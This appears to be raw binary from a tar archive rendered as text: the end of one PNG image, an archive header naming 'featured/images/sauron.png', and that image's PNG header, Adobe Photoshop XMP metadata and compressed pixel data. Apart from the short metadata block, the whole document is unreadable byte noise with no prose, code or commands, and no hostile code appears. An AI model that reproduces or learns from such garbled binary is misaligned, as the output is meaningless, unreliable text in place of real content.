����H��&3)Բ��@��Z�C*ea�s��o�+vh�+����K(�Rw�Q�|�-YRK�z���ڍ��!�s�n`b��3L~-�\��֮�h��}t׏��S{a[�p/4,kpe�{f�W��M���ʵ2l����g�UO��� V�bi)�h�8(&r�����(WLI��L�Ǯ^L�����ne���&+���{��CG�t��h�~V%QP���U�:}��^�s�;B��e�So�6f�J7�U���v�"j�!u!�+�3?uh[��L);>H@dFS)�h��Qe�QL�l\%���S���$�sg��&�L��0zss��1��X:���
�vP[��a��֥"C#��%����[.�W;G�p�Z���C�L�Q���:�|O����cR����`S���z�y^(�b*�HI�WG}�Q	n��q���*m]WGH�#�HA���%K��h����~�a���D���s�����(U"X%bHQ���uM�=�d���x���0���T:m�aOTCR/��e��lSE`+mfq��r>���\��U��F�""5�8K�5ǜ�\#����odW��/��[�ѳ�>GO?�,-_��6m�Ē��t�ғޅ��Z�"���z�O1aCLT�&GX��y��*͐v5�e5׌#��P�ý�R@Qѝj&_�H��	�2E~�&&��SĐ�T�S��m�N�e�WЉ�}BU�����S7�M(S 
�i�bX�):t�/"�e�1����}�F�T��H�p�
H�#�HjF�gJM�cz�&�*7
�c,��-󊄛����ЄQ��g0"do'�Iڱ�<�)z��W��%��s�C>�$0�6�h�)A:1�/���Ik�\���5��s>��{���R%�"N"�k��|���.b0�H�Bg���rK�L��@�p��6�t�ی�c�/IG���.��؆ˊand3y�`�7o���62G(�HRgg�H�F�5Fφ�h�c���{X*i��6�"�P0�S�nRئP�KX���P]x+Z#�[#��������d%�������S:�
-���wё�}������b�Kά��i�6�l-��,9< ��fɁy�A�����4�P����j����@:ª�/�c���.�̀P�1�j*�4S1M@Յ%3�*`S�K������g2����XtԘk�`T�`�s�a9�c�,���Yf��������T0�
����s�xw����`H��C����
5�����q؈[���ʇ)ĘK����3Oa��7_U)M}==M�$I�E핐V��J���T����BEx�i)e�d2�&_XN۟�4$F2eD�0��[EO���#�:u�H�y�gS`'��zBJh��}���p_)�諴Kj�  �	lS(��r@�H��&�ẙx�ˤk���/��c���������LS�x]�v�5���)�s��}H�a6Y,i����:$ 2�%������	)�P��E"{B��b7��O���q�3a_�$�Y�0.���0�ϫgS��,,����Z�%EW)�8RɆCYDu��Q��^��($��[|x(�g%�w��O��=q��]Fb��I2�6`.�+��-�s���d�*0hF�du�F��D;��ө8"�'IQ(TڦH�����m:�[JS��/�"�@�Iv�S��G���J	P(�����wϸ�RB���3Fm�]���i9�⏥�Y)��tK����+�����G��E��"�i!I�	��%�[t��,]x!�c��)�RB��c����dr�
��Bi�b�B3#�i�
c�ژл��	��6m
�8&I��>�h����\����T�m�,�6��%�D�[t�*6̦ sMP������r��b����}lG`ޥ�i��L�����a^�;*�y��2�bw9@���dae���w�p����0Sl�U( $E��gɠ���'�L+���_��*O���TY쉧(��(�:?%�T�EՋ�:����>��o�y��L_�2�{5�g/YA�Au���[�2�X�ι��\*rW����ce�B$�}d,xQR��r;�)��z����B���2�H�CM���H$"q���hTܛs~�v���3�rp}r܃g�U�q�~r��C���b)�b����4�Զ&��ܠ�6��
��Uw��f677��B���HN�<)Ω��&�\�4Í ��{{{�I<���E$�T���Fe����nѢEb�g<C.�����hhhȱ�x<�^W
��wr��LR�
������7u�U��¾wL(���w�箮.ы3����U��l�b0��I�^(�{��A��3q���s���}`l[[����rg<�ٙ���>|�^W��G(DbX��E=�ԓ�4/��w��>��vI��#�����n���ѠN��٘C2����*x~�L0�e�M�����wڷCv+��y�g�m�,�o���)��C)�@ﵿ�T��74�G6�-7T�37�y�3��A )���PG;��ź������R��AJ�_��
��V
(��em�܋��/m?/����+{O��i��̮���eE���a�.R���C;~�`g�P�˗��}��[�l����H���r�)9�j]�
⤃�}x�I�e{w�3�y�N��y�'a�7X��
�5$�z���;d��X��
r���>~��с�T0fP���|ʶ۠�K�9��b�\��\�R�
�강ט�W�4�}t�W�]͜����M�H�����.��iG�m<�cz�h�/�E�[_�{�P�eW�	!��t0.�����R$�]_tG:�cGV@8����ϥ</���Ϡ�>���jnr�W�"
Kxr���-0`A���+��CR�\�k���� 9�b���{�D�Շ�?�����3n+iXZ� �?��r<7k�?[�/C���_�y��HS^O������ӭ�zv9'����t
���"iC�q�P6Ԇ6A�2�/�V~��BJ�,�2��(g*1��E~�+��R��Q�Q)%D@ Z����]�bFI�_�Qt=����0@�����g@��L�W��xs����M~�z��[e^�k�fLY��,�h�J�ɛ�%��%Á@��27��t��e1*Q>�v�d�*
��YF��|>En��m�X��̋�"!n�tݪ
!1������N����,� u��;�QǬ�ȕ�X`�3�v�����[��B�4¥��g�Յ�	/א��O�
(20���~�r��|�v�`D�(%
�����X>`.��y�vn��;��/��|�uA2)$Y�I@<�t%0�g.���m�������S���1�a�9&�H��L��"��*
�
�47�g��.��URjX��22��t0X��9��+V8�+2���2�����I>n��7��18T�r�䘍��`��)�`]D��0���)26ޡ
K��=ܐw0 ΂����� ���%�s:�E�p�3�H����PH�����p�~�A�(��N$v�Qi���v�KJI`%k�!N���-*���Ԙ��M�{�q?�=�&A��VɑIzXbJ6��7�q�U*XW���e�|k��_f��r��3S%k��#G*����Y�Zf��2�odZ!%E&`�+8�9! � �(G�n'cY���%��Pȣ������Q��l��$-2
�ۙm�us�@��x���L����b6������Z�F
�U|\'�
vU��ʰ3?�6����Lw3͹9�sIRLa���v�73�%�;�Į��*#�]�t�*d��1�kU�0�?_$�Sy���1��x>_��L�Se��M�=3~K�*��^�'�K�1?��ED]�t�Z�UL+�ژ���6�1�PQc�����:�ȚƎ:{�X�e��*nֵ[��M�r�
���p�
���pKE�0$�&m�NIEND�B`�featured/images/sauron.png000060400000256514152434416630011646 0ustar00�PNG


IHDR=
��tEXtSoftwareAdobe ImageReadyq�e<niTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:6d3adad4-ee9e-6545-b78f-b505173e3573" xmpMM:DocumentID="xmp.did:9F16924CD6C311E4AF41B8743796E5F0" xmpMM:InstanceID="xmp.iid:9F16924BD6C311E4AF41B8743796E5F0" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0C74895084D3E411A258917B1913926E" stRef:documentID="xmp.did:6d3adad4-ee9e-6545-b78f-b505173e3573"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>墟�YtIDATx���e�]'xsz9U]�9H�$�e+[�-ɞc�
�t��,kv�gv��̰,�v���Ar²�m���Rw��Ρ:U�/�ws���U��-�6��sę��Uz��{��}������IMӸ��������pGRU�����\�<n�\���E��,�<n�쎷������[[Ǐ�0�n.���޾u�/]��o?}���a��z�߸��˷�X���e�y�7~Ho�U;��*�7�Ȋ5�7�?8�=ǜ�7���qSoߺG�껇ŋ+�g�Zdzj�
;<O�ҥK/��m������ΩS�
���������i�_��:��z�С�{�����Ot��}��%t]�ܹs�(=z������J�d�<n���c�����`�O��49>���?��?={��eY��G��������K^�x�~��/.\�p�]w��o�4������>����ޏ}�c��ԧp.����8��̙3�<�H�Z�)7����<���s�P9������G�8�;Q��@K�s�!��~XQIZ}8OUU�ײ,�ӟN\�ʯ����ɟ�	^?���~��?������ѭ�ފ�x�W^y�|S8n7��;�B�|���W_�Э�C{~��X�-�k}��g�*_{��۷�1�O^���v�m�
��O|"y�u�����˗/C]GGG�����d�<n��#��F�j����Oⷻ�|�P�}���k�v�=����<��y�n����5N��ڵ��;�c����on���㿝�t�ر'N��M�����].�2��˩�'����?��|�x�Ν�N�JT1��^�x1�̑#Ge�N�a�~-��_��_$��B�Z
^������M!~�p��L~���'����~�?�$}�O�;w�X,�ս���Ïl7�2����=�|��o|s�w�����O��'���UNLL@o��>���~�g~�g0�N�_��,	���~�駟����9@��{���ױN+++�����|
}�U����n����!�v�����1M��a�p�Y���<-//o޼������KKK.\�_�������X0�q`��pq�8L >���>|�w�%�Gp���x��ׯ	>r���r���d6�1>��0���r?255U(Hv%	��xJ�gff�¥�� P�������}L��.���j����|��K%��[~qa����9���o�=^�G3��W�Me�Mٷ����ϟ5��ر��ߏ�6gΜ���޽�7�'����F����c�������;P���칹9ܺ$��z��H���Ɇ&��]�Z3�?y�$T��P*�w�3CCC���x|�X��8�\���%ܵk׺bCE1۸T"и#^�E���r˺���/��������Ø1<`���v�Z�b��i0P'��N’b�8�G����ğp>�
;�O%P�@���5���;���
�C3�A���B�q�����#�<����ߏ1�e�viq�-��7���9�#�L�E�d:�^��-$b��Lh<>M���zr��lM\-q�;��{����(���
��?��Ӿ
��q�1�5h{���;
"N�`R�TBU�^�
�
?�+(�H��Ə�f��<TrA���ƃ�c��,~ŧ6��|DbN�q_��$���~vxx���~��M��y�Q(0� ��Owg�T�?4Ioe/���[�{.!ώ,���C$�7�����1���<ϭ���V#.<,��1;19����?}mAc��Ii�o�>��~��aR��μ��8�_��?@�k���6���^�H��7�#��3�f}a�Y
������Z�sRue��G����1y7�b�ҁ����0����s����aQ1�U�c۱=�Rch˖��Zn�H�q|	�'ʟ���=[h<��>;^�8�3�"�(у�<M�{���Oѯ�ō"����yQ��gDQ�S<]*�{�l�ow[�,��1�#��u��Tb��)
" ��&5��k���gO�.�E���v1�xM��B��$+�\~c�4�<�9�o�p��\nHY�ָ����~hg��]����-�}��l.Da��c�L��+��8���W�kݬ��4�y��n�n����p��e%YT����(��B���WWj�f�G���]3�M~}>0(A��L��0$�f���h�J Ob�G�h���aBLEU|7�]&k��x|||ll�5��$���q�4�?��������ߢDj�O�X|E�4&��K�;�gR)U6X�k>�d��G� �ՁJ����\+�U�˒Fž
� H��{�tu����o���Ϝ��^���Tb�8~����w?�x��ܢ�*ž? ���ԅ���%^n,�]7_�e��t�3�=Y�e�|'��2^������9����2ǻ��x�#������0����ZJ�D����%
��㷪+]VTM�+��F��
���\�,ap9��T��?�ǀL˒��e1�v��ɣŢ2��4�d�{Z�d��i�}HV%�duۖ�����RE7(��G8&��=���D�.#�h�O�8fv-5
��J��K{�;��esX����?�ljo�zdu1��M��eڰ���+�%E��صO}[���:��������|.�I�T�.a�`t��ab1�t:�i��8�|1��D�t�$/�j��t��I�fG�z���$ŏL/�7��v�Y�ٝ��z���{��#�Wf��C�D�2���nʪ�w����u8N��ٔ�Z�;>;YPʛ=hxcI�q[
�^Z�Я������So1�K�[!�SXbR�(`f�Qc~}u�Ь�d�I�$�3�,B$Ls�cڞ�_g��o?0:ԧ���u��"5m�Q��tv:���R����`�T�V)�du����)���U4-�j�ڼd�W�摾;�ۓ��TZPe-_�81Ne{6���R>�����]�2}��澬ӮWz6Ӆ��b_x�]w󅳎eIPØ�8)�/Ğ%+�*�r�G�����m��ɋ``�`e��dE��@�$�E~-�U]O�˥bN�E�[5-�)�RH�+Boh���rɂ{�D�P`��U`��"���_s���D?�0�̛��,�����s3��h1s�nl޲c`h(�V=%O�G��V��Q2r(&�"!(Ouy���7���G�R���6�J�
�-�v蹞�J2cM�
��#�'���#_���4�P�5M��LZq;UU����������,�t����2�X�T�=0��L*���r6܆w�[(E�b(&�;�"�f/T'O_p����:}���&E�D��2������:Ad:6j�5(?��qV�<�s�
�`u�&}���#�&� +F:%y����TR)�M��G��
t��cI���a���S	�.3��:<L)Cj?��Dm%gp���{��+p�1gZv�؇V�`#O��,2~�?πd��	�΂�e&��M)��c|�"qc	�c�gR��[Gy�$��Tp�:V[�#��j��v
U�ŵL�YoU��@��>'-՚j]�z�{��hQ�8�-`��w�Q$Ɵ_\�*N�B
@�`@�(`���E�����^�Wӹ�ͷ�~W�=
C�0�Ӎq��yBš�������B-�b|�F��
���8
JΠ�"A�����זcB�rBM�<s�U���NX�(C�<S��$+�t��:�l+d#�3W��e�Y�.-8[���Fւ-;�rQR�(�x�H�N��@=�}S���)��Ԣbh\Z�e"�m[N����B�lt�$���e۾uFD׵��Ѿ�>\-_�o߲}��p�ԕj����tN��bJ���j��V(�����鑶}@^�්Ł���`!WL��L��2m�tC}�1�(�A0���.�@S'�MU�$u�B+A�xX<{蚡���NC�G�|`�q�r�����,�/��̳�K�J�ٳg�q���B�nٱ}����}.^G�	�5r���x~S�L�A�X����w��n�ɯ�m��d 2�,٭�bNѵXL>1ˤ3�LF��@�jF����S�v���8ui~y�V�d
��հ���aD��Z^64)�͸3<��9����`Ί�]�v�/� <��Y�ARӚd
]%�
��b�U����J��)^��Ylu�Z(<�30<)R�py���:�y�������nƘ�U�#F�A2�$��8����pB�f41k�f�p�e	�nF�I4
n^!�Nd+�fuz����,�Q�Z�CLL��{/O�/�J�o�[
&$H�>+��z]�c�4�D2�M2Ŧe���lٶ# rȔ���S��9������rΉ�!,*F/�[6�{V�u FN��C��2E���&n4	��k��>v�V.A >�#�l�ok~��_��O
*�H����c��f�61s|N���[���|{.D��ź�9!tT��&6�V���@�46bdL��a�h)\�bo�&�����
0:�I�o9fUH�^�C%4#8����8�A�B�^k6�?z�g_���Ut5��:�k�� �V��_�ƽ��}�]��)W<���I�w��^��1L%&���R�"�Qoo�l�!��%pIT,�2�6�۷b�(�-��F`����R1��ۏ��/����5ڶ�Ry��|q욶��(��@c�tV�ɑ���>��+W��	�s�d�Um,LMnʕ2�ru�F�(�i�峁�&�
��!OB���X�k�������pD���q����d�,�F���ӧ�حj���;&,4&l9�賽}�J.}ifO�[��%�^�2PĊ�-�1��q����&P�EU��b�И�@�e[K�P&D���B�|�p��Z��ݾc��y�a�Dm�GX^^fz��s�$�ɑd�0���Ȧ�`(���̈́Ǣ
�}!A!���N�;�U�,�s7Q����ZiY/��
��
,���ۅ{�UQ;tC.�0y�r�R��A�X�6M��ܮ�Z~�N��~#p�����'�\ی���*�L�"�E6D��M�R�Ό��&�b��ƪ���%l �!„�s��(��)��s�� υ5��̓��N&6t�X-5��
��ۈ��!Xב�g���4`U���H�
���3��)��r��k;�e_�t���<��#?�л2)#t}�ͣ�LIBD�9�9G���w���	<�X�P �8��k
�b��1����rV�[ªhJ�z��K��ص�����(zRRi({FєBA����p<��
Ũw���7�X�x�mo�ز��EL�)���n�ۨ׀�]?pA�(��5�h�81j�\�Đ!��m@4B�hc�D����E�B�;���LNuyw���;������e[]�H��L�#�#�G�Dq�m�ōH��^@��#��51i��;	D�ȱ�5�7o[&n���,@Oҍ
Hf�SW+�B�\�6DG�ȥ�8�zU`@]W$M|2�$J �0MΦ,ϟX�C�Z�V�X
�pc�������VձM^��lI������H��r���g��8_����E�|�6�'�]8lx-#q]�Z�&��I�����FF)���;] {A�qۘ4
��
\*qp�� �G��o�{z`����L{ ��+�����I�8��FL)��pO1��0�#1�����u
sơ�hjf�����8��wSJ ���ld�F�(��p�\�Οǜt۴+��8���������?��'������|Ӽ/����t��"�E����	�1	c�KE'�U�-E�rB��N����>8&DdҠ��G'��H�
H������e3l()��j<�2�$8
�]��[s%�X�lߪ���m\�J�bN�(|��3�ĸX|�V9K���
n��J��o׶�g�(�ʼn��h�KZ����=�Wy�1��<����R��E�ٚ*�H�|B
��	�*�.��5�%�LQ�U(K�a�B¦(V����4N&[F�z�uP��ǚ$y1|N�G��p:��>-d�m�ɈB���2T�'���xz���y��r
� %���-Z�;Y�-�ϗK�[��G,TƼ'��rN�$yOP�n3#u���+�����X�3J`�@đBŘA	0E�?��b�-�`�岖̈́0��X�����a�#jlv��ɲ��2d_�u<��֢�I��e{��$J��h�#�/��$2G�! {(0ZBt.���IJV�<�7db�)A:�۳{���>�l�V)�����vk����3�~���0l���0���g[ Y�VN6;���4Z-MU�h����f`����.�Uλt��' �@���)�HPĽ���UD
�誒U�(�Z�w�v1�S(��ɊRL�O�N�o��K̤Z�Oٌ�ׅ����c>�ڄċ�V�M�χ*�}ہ�p�G!o7���OK���`o��{����v�}��%׏������n�i�ڀ_m8�8,������/jr+-s���8Z�öK���>]�]�9nK�:n��z��~6�e+�!��Ȥuh8�$U�0�J�m�vR�.%YMe5�5�e�Y���c�HP�L���4�'4�С��a*��Y�J(�4�jǦpDL_���,f�#�?=ۼ5��ؘ�b�"�Vs��r�Vp!(%/eSz�M��+�k
����դ"�^^T��$(J��<l
?��D��"aa~.p-�:%0K~��$�[
(l
�%0��˭�:VS�4��7׊CT��W��0'��i)����t�mPt
�
1���R�絻�RӿP�V�<�$���<�>/�1�~�ǃ<�&[��,��	��殺ݼuK�\)�ʣ���Bnll�����p:��b����J�~]H�a?���#����?�L���i6��
��]YRuY�
Y�7��������3�}�/?��O��mA8�O �1R�`��$Q<_)d�t@]|������x�"�ߊ� �<���c�X	��4�� *y�#)��������R�x��1,�GIB�ׇN�x�qR>��+���*��KS'��]	��}�������_��G�U�X�Ģ˝��]?�*b���K�^`�Nk�Ğ�ԣkh}e$��1�̠����t�gX��S��ف����E�=�xҰ`���ߍ=7&��&�{
|�NL8䈜'���X�I�I[+M�	
�).�Jg3�~�9�%!/c(����B��UQ�t�j}b�R��)J�L0*>;�e��V�\�(��86�k�Fo>n�ۚ�C�f�'�u<��4�-`h���d�H����fC�cL�Y�b*����\����PdA;�a$A4�&x���N�GJp�3$q�@�S�+YH��w��W_��b:E��~��`J� v��*�[�t0";��o5���x�*������nn��c��9JEs�)"Q$Sj^�ڂ�+%�ݕ�e�4w�e��-YC�� dJ��Q����ݗ�7
��BE��_��������V:��8�#�h�֨�p@2$
�F'K�����י������==�?4{a.
d#	��Hw��P�NV��Q1�Ž�7AאJUR�n�N��$ޛ�$�S2dD(*N��V+=8����c�E�J�mә�(��y�7H�y�ūD+�X�ۦ6�O�|�}�E}����j�`�����_�ⷛ�v�ZR%ݐB0��d��P��DA��M�=�R޷=�ۅ}APU=PT�)xm�c��}�-{�ؿc���
C9���2R�ܶ�9qezώ��B�<3�rx��T�c%P�Oa5J�rc�1�â���,��h-�^s�YIR�B��a�g�ro�����)*YR��ul?�K�r�K6Nwi�_Z^a��"`d.��+���T.�ڵjշm�\�q���i���X��Ψv}9T����2��ih �ҩ��-�j_�R@�2�
�)Ս���Iϱ�nb�W�Ԉ������J	�yס�^
mҏ��"BW��T#��S��Zdw"��$c�d#�5A$6��Q(�J-��T�iU�#����;)�NAa�R�!!+�γ��²�{R֞B���BOa�Y��z��j'�u�x<��sK��}��_XX�WY�T״,�F���ջQ�e{D�Hj���Z������~4���ap���(��?�M�'Ҳ����
���%8�b��x����`�V��(\�l]"��D:IQhV�����Yy�@��%�	�URD�8j��n��e�BX����`m��+�s�b1S���z��yVB��>�_��``���^�k9����MC���̙�&/�w� ��
|�S��#@#�6
��C3�˩t*�I]���E�P�Z���;#���\p~�Y�f�o��4K���Z^��Q�7Y+iJ"�B�_��__������R.��$H��C�V�.��`#��C0҆
�<�J�D?�)��iO��:p�֑�v�mw��z�@�nj�4Y��/	I������J�[�����̼�JA)�@u=P�"�����y
���l��͊���@Ƭ�c=�)�xz���8%l2ņ���PD>� ����l�j�+��e8I��#S�)��)��l���ع��y%@�7��]��Րx���,t���۬l+�JA=Z͵Q�Z���a�mH���Q��oR��ɔ�V��Sǎ_8}w#���F�A�z
�F�T
�./���Q�C�e��SV�^1����+�m;<�ґ�~,�N�����]S0�њj��e�t� ��X�}�}�EP�G�7�K��N2XƼ,g�~��d��Y���J���	eQV.�Z"@�D����D$b�W�t�	Z�Њ�ɥJY�sCQ�R)mvfN!�!�8=�\��/
��]��Y.��W�zr�7FJ�[r=�yӊT#%c~��ٕ�sU>�B���F`�$~��cHj�<�j>���8��o�+�K�с���3��p��IJxԵ<��X`ba��\3tK�4B�9b�Q�����9����b�S�Bx�4�8ϒ�ƈ�@���<ԛ��2�wa �1R�H5614&�$x{�7j�b���q�v�"1{C��U�4j��@�(K�r�'.E�I�xt_�����6�D�XPHɳ��$��GOOo>��vM�[��#i��)��̃��	,2�2��˴c�Y���)W�g�%R�)� ���E9f�ekP�Z]x�_��e��.�.��x�,�]W�{c�t#�A��>_o(ܩ�,�B�P����oǒ$p�n��Zv ��Ӆ^����j��Ie�������N�?~��;���k���]+�%�m�'���w+lܴ#IVGqx�
�͕�BAb�
�"#XW�	���:�ݕ"
��4�*�0���XC+�+�H��*T�PyE#�\r1<P�3�*}�Ǐ�O��R1cۊ���Wa�]��-�=E��
'�V�\ޢ�vw�0�`����E�b
�p���`�[f׃=�]��
0�i]���Ҫ&�ec�蹍�%ށ��p!�-[X��J ���"c�u@�������V�|�w��o��}=eυ@�tͲmXP(!����+�O�l+���/��4��ۦd�	ʃ1
YtP�}I�3��m-T�	T�!&�\�9�壐�t�I�K���w�X�-���HZXe��V��^��{�c�{�=��Ot�-BbZ�[����������l�����B�ecC��"��KPZ�*�b��X�����J���]m��֠��O��sX��>_D�u5^����ʬc!~��-,��?73�*0���@�oʊ��$OR��voZ��F�i+�:�l�<��j�l��ԕ�H|�D�x�%�8.���W�^ep��e����:{]��5�E5��L}�xIa�3������C=ݣ��5X���lmE�i:��%�28�rD98]ˤ��B��v,��!���_y�� �Si��h[�u|-��3gT>n�X'����d��"���e�2�d(��i�م��2�M�U�#	�G58]^lAO��<�W�U�
�lG�$�M]D�q��D�T.i����V�"�76֐^�
��8?�P�ģ�;!y��oSO)�׌�&�++K&X&+Y�5�ƶX�&��YoB��6m8S����Y'L���������Uq�����Ys�+���s.Q� G��H�����"Z>�q�V�i�@K'r}��g�����H�`�D;9�����o?�-u��7�?֫�����"죯PO�4(����S�=
U�Hri@4>r��+���p
�K0Pv��X���-]/�aq���^D1��i9�+�j(�p�vײ-kx��\�m�+��Pԕ��e���+��eMW�c��6(5_(��ۻ��S˧N9f�'%]~y*H�(K�s,�)�K����K3������j�1]V���5f���	3H��h.Ó�N�'���X�X\�& ���K�	�M�X�j��\��M{ll�.,s}�T���ũ١��G.�>ݩ�ܔ糖��i�:�x&�Ȗs�!**E7��R!�Nq��y�_�m�6���k۶�w�K!���ŕj.
j�Nv^O�-���z"�[	����gp�]��z��
�Y�&Y|�.�؅Y�j�
�~
�Rm{�&fn�6�8������2s'E�¯�t�B�f�y��}Yɍ��Ӟ�ѡ�2ma���%���Ae��ej��l̡Ϣ���욗�fUU�U�%2�d:��'�c�X��w��r
Ȝ&�׊"�(/.�y�؃���7�.T~�{���<��*��P�t�؞�r�'��%U�Mɺ������	hR��LE,f��l�i��iޏä�j�汨M���5Q�8��a��v�mu�ũo��~�˿�ʚ�����/-���qi}ؐ����1��5Bۖ1�\����^�0i0�����1:���������ΰ�T`C���X���l���,f�V����M\4�V;/�Lә��++��8�Ґ�{���!E!E@"��wڮ�`���E)�+�㝾�p0�5c�t{��r1�g�a���n�	-s��t��}�$���B6�_>;���ݛ7S��"�l���'!S*�ĜJ�c~��`QB��N|���z3�G�c�#���jNLv����i8��+^��xy��T:��q��D6�5E�d���.�$��)^���7�"x�0���j�2'V��gOO߶ksZ�X�U�@���ޱ�:�E�%Hꪷ�Ca�TQ�¦�A�9&���)CO�|$�����c'�"��a����
�Μ>����؁Z�(��;Ǒ�j�r�T,e��g0���mw:�n�ó,%]_]?��c�߿o_>�BF���l��-��Ԁ���iv�V~Ӧ���ϼ�j���T�
qZ*AY�,+1C��aB�r&ܫ����D��$�*0�w�<
%5��Pђ�q�ۂ�ʥ_}�ɯ^P��a�X}N�aN3i��f���+�ق�{��B������6�v��.W�S����!�żc� A��z��7����?�sQ��qK�պ''"��aP��q�7؃ �Y�z�Y�y�b,��֍/麒S�vui��E��mF&�M�3W�-_�~*�T��*
��1�3�j^�$��Mݽ���f,��q�����S��?��L��]�/η��ȴ��ea��L�5-
�MS��(2I]���{��j�]8sǗo����yATB�F<�\�엿q�rm��˦yui%X^�Q.o�f��)6n��Vu�M�#���Z�]���Z�5��ZV���F�Z��t��rAVծ�Mw�J.'NFS�z�1tX��@�&ʑ�z�5�*DZ-�3TV���<����Z�_ޚ+�j��s�)pI�u�$C1���ɔC:"���Dt�糕�<4b^���w�ۻ�󈦑r�'�2�«x�v{fz��;|�0�&R��x�̩�}�?������0VA�t6t�~��Lc���B�l]:�]�T†�H�y?^ޔ4ϫQ=r�Vs7��!(E�������v�sM����-��p��gt�Ыd�"Uǔ���>}����ǯN�3����W��<�v����
�M�6�WBǭ-��凵l>"��c�:.�X�鱥����R��4;s�N3T6�m*h��WNL}��~�ٰwb�!��~�����7��7�֒� ��/6��U-X�¬�!`�4�������
��~SyS��ԩ�r��Z0!ix�$�@1Pi0'J��o���(˜5�V�m��Y���eyn�č�4{�;����/yu~q��H�K���@�_����5˄KQن7�b����?�W:��0��K�S���;�i_��'Ɔ������4_�|��JoA�ftU�M�հ*=0&���m1�N��v��ٶ1����eOɨP��)ʃɠ��_�	a.E�ù����X����S���/��)�I=wd/�H�2l���s���ܿ�Zq%P��� �O�ʣ[�l��@�A(2�wz]A1Ȯ�ڀ-G��}������-r�a�{����6�;m�(�o(RZU*���]�s�ܑ�G�*"�/����9thd���4Mr�"��#�M�3JE��!���l����f&™)>�e�K醢����+�jۚ�qk�v�o�Frr(IJ���ݶ�xzORړs�H%1���T8k�Ű�J�T_�.����zi����}w?P(W,�5R�q����-�v�:ztzn�1��핅���r�kۜ�Mǵ���]*m�>-E��r��^�/~����Z�֝[7�
�v���ufgY��!~v�Ԍ���8�S�y�麾�"	���Ga���
��B�@�H�@�e�PũL9
���Icݺ,xB�5� ���
���T5Ŷ�2�ω��-�n(��aw���/��RA������ 
N�y���I�0Ԫ�n�麁b�F.��ߛ�{p\3�m�=͌��+��~��r?|מϿx�<��o���ux��:xbi1S�aS�
*���8���F��~V���hS�‡��j�F]��f^1�%�lQ���K��G��O���\���tcT�i	P����R���äb����w=j�a[U#C�0��ca(��ǫ�|l�w��&Hڹh�F��Z8���5Ӯ=���Q��}��� q��&�eia��'��?��G1Uө��J��#:�AQp���3�	jP��\��nO_�g&�˳��"k����>vۦ�p{��W�U�*��ߒ=�(>�������n�27�QiV��7 �j�/-�s�k�*������5#YW�ĝ���7�%j��E�a�GGG7o�4q�����SO��'�еc�|O�!�����hfL;j��K�'?��B,�:4�=�T�^�y����e��V>V��%m~k퇔5�v)o������k��$51�6�ae�LҨ��J�'�������Ĵ�ԳB7��H6�$jȉ��Iv	�e|��W�UI�pf���%E"�P�_�Yy��wv���-N|�s&Bo�g���=ÕZ����@oO���*�uDFְ���dT�: ���
/�lG���䖫���h��<�v������O�0�j_^X����{Y�QG�LZ��%�����E1�-xAD[j��y~��P!U y~�rӺ�z3�v��7�"8�|5/�~W�!�KK+p��\��4<04b!jD�o
kwH�Є�`p���1I(Is���T5c�7#[r-�Iރ��i�&"��4�V�Ut
��z6$?d��p�,���aw�0>v�D̀C�� x�*<��o������"�f����$E;0�~¸Df�R"+�6�r���u��z}n�������4?;qi�0�����%�=&I(fK	�S���Qs�P�sA|���z���{-l�%3��ΟP{h;>�LKU4�U�����c)C˿����-|R�-������qB��+�.�{��;��m<N�5#��i�2m
6;�Fgn��̫�I�b��V+�t�8��G{쏯G���~z�z	cL���m,�A-C	L-��D�!,�r��(����F��F��O\<�K�T����r�Z�:qY�����vKIz(�J������䴻'ϝM�w��`��m�"�su�5��v����(W�f���g��+����:�x�ّ��P��\�ڵs���2��~R<B�Ζ
��>�T�-��F+Ne@zCY�C��������ː����ɥjm�&C�M��h���;�ҐA�#Uꃇ�^��:��,�@6[.���2�:�*b�DT�y�"����#^$ia���d+���f�vR��[�Zv�r���q���@IV�t�ٽ:9����l�w��S�Iv'Q�db�I�I�DWw���7�E-�q�PVN�/4�q��@�b!����>XB���?��_��_d��2nc�ɒ��M_`�[6l#f��"Y�@��m�sl�� ���G���(��2��t-�K�2����N�R�]74E�%ʃ�~H#�T�K�7N\�cK�����tL���p��'I]��5:��36**��›94X�ݻvmݺ핣/�)��/>6><�/,��t:�+�KSSQ�C�[����R��R�>�K��{s���Wn���=��ר�Z�ֶ�y'/M߻[������g
������/(�j��6�	�[]���\~�����~������\w=��"��r�_�ݷ�zA�k%��^|��B)�g��*r�"��W�/1�;�_}����;|W��L���5;;���b-�Ա��3��;�w��jti'Ɩ�Z]E)�F]�J0��}�/%	�f��PR�����{B���K��f�T>3���v�m��奖Yo�X�.��Tr�pD�K�6�
iK&A�z�W���PT@h��>*t�=]���u�{��䞺v@8���L.�Sb�^ډF����kb�h�GxM?(ӷ�v ���ϜI�
���N�U�F1�;�j���X�)���V�v5tƺ��r����E�;咂dؘ$�Eu]!}����z�]D�F���s��MO�����)�C�l�2���v���86�Ӣl?̙�� ��B�6ڡ�=����,;ב5����ҙL.[*��R)��J�����A00˄��F�v`D��#O~� 0�C��l6�fmiiir�*�i)_���W��rk��76�n���ƩhLW~�����+��2튞Ne����T�&'��k_?��k�i�:ҷ���ѱZ��H�[�*���pπյ�f���d�c��k՗���4#������)6�$i���N�~�y|���,�*$(D��$?�j~�j["���KN׬�\ur�Q��Q;�?����;|�_P�u�k{�������Jf��b7d#s�����{1O�3�������:Ww
�l%���er܋m�Ѧ�rW�|���Rّ�^]u�U�f2�իUwi����~�;���X��B���q�u��-�������3'O�;q���3{Qؖ�!ᅵ����ȥ�`�z.0J�n+P��[]+u�u�]�7m'9e�o��r��*�m[W�u�uY�Q�V�v��e�W&���\uya��wbr���g���w�yn�ZɄ�y睲,�Z-YV��$ICc[��GJ�B���r�"��O�#!$ԝ��-c���0�e]�2I������X����X���]�oӥ�?Mc:�i�\��O���i�`:."�~m�#�[�vu`���e�/=ir�._�/(�	֢SL5Lvc
